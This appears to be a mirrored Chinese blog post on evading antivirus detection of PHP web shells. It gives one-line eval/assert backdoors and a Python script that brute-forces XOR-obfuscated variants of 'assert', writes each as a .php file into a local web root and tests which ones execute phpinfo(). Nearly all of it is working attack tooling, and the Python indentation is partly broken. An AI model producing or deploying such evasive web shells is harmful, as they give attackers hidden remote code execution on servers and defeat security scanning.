zoukankan      html  css  js  c++  java
  • php异或免杀

    import requests,base64,time,sys,threading,queue
    #异或免杀
    #<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?>
    #<?php @eval($_POST['hacker']);?>
    #!和@ 先各种转为ascll码,再各自转化为二进制,两者二进制异或结果,转化为ascll,最后转化为字符
    
    #string 检测phpinfo是否执行成功
    def string():
        while not q.empty():  # 判断q不为空
            filename=q.get()
            url = 'http://127.0.0.1:8080/x/' + filename
            datas = {
                'x': 'phpinfo();'
            }
            result = requests.post(url, data=datas).content.decode('utf-8')
            if 'bingtang-PC' in result:
                    print('check->'+filename+'->ok')
                else:
                    print('check->'+filename+'->no')
                time.sleep(1)
    
    def shell_test_check():
        url='http://127.0.0.1:8080/x/33xd64.php'
        datas = {
            'x': 'phpinfo();'
        }
        result = requests.post(url, data=datas).content.decode('utf-8')
        print(result)
        if 'bingtang-PC' in result:
                print('ok')
    
    if __name__=="__main__":
        q = queue.Queue()  # python queue模块的FIFO队列先进先出。
        for i in range(1,127):  #ASCLL从1到127
            for ii in range(1,127):
                payload = "'" + chr(i) + "'" + '^' + "'" + chr(ii) + "'"
                code = "<?php $a=(" + payload + ").'ssert';$a($_POST[x]);?>"
                filename = str(i) + 'xd' + str(ii) + '.php'
                q.put(filename)
                with open('D:/phpstudy/WWW/x/' + filename, 'a') as f:
                    f.write(code)
                    f.close()
                    print(filename + '文件生成成功')
        #多线程
        for x in range(10):
            t=threading.Thread(target=string)
            t.start()
  • 相关阅读:
    C#--C/S--学员管理系统--6--班级和下拉框的数据绑定
    C#--C/S--学员管理系统--5--通用验证类的设计和程序退出
    1046. 最后一块石头的重量
    1029. 两地调度
    1005. K 次取反后最大化的数组和
    944. 删列造序
    874. 模拟行走机器人
    860. 柠檬水找零
    map按值排序
    map按键排序
  • 原文地址:https://www.cnblogs.com/bingtang123/p/15138754.html
Copyright © 2011-2022 走看看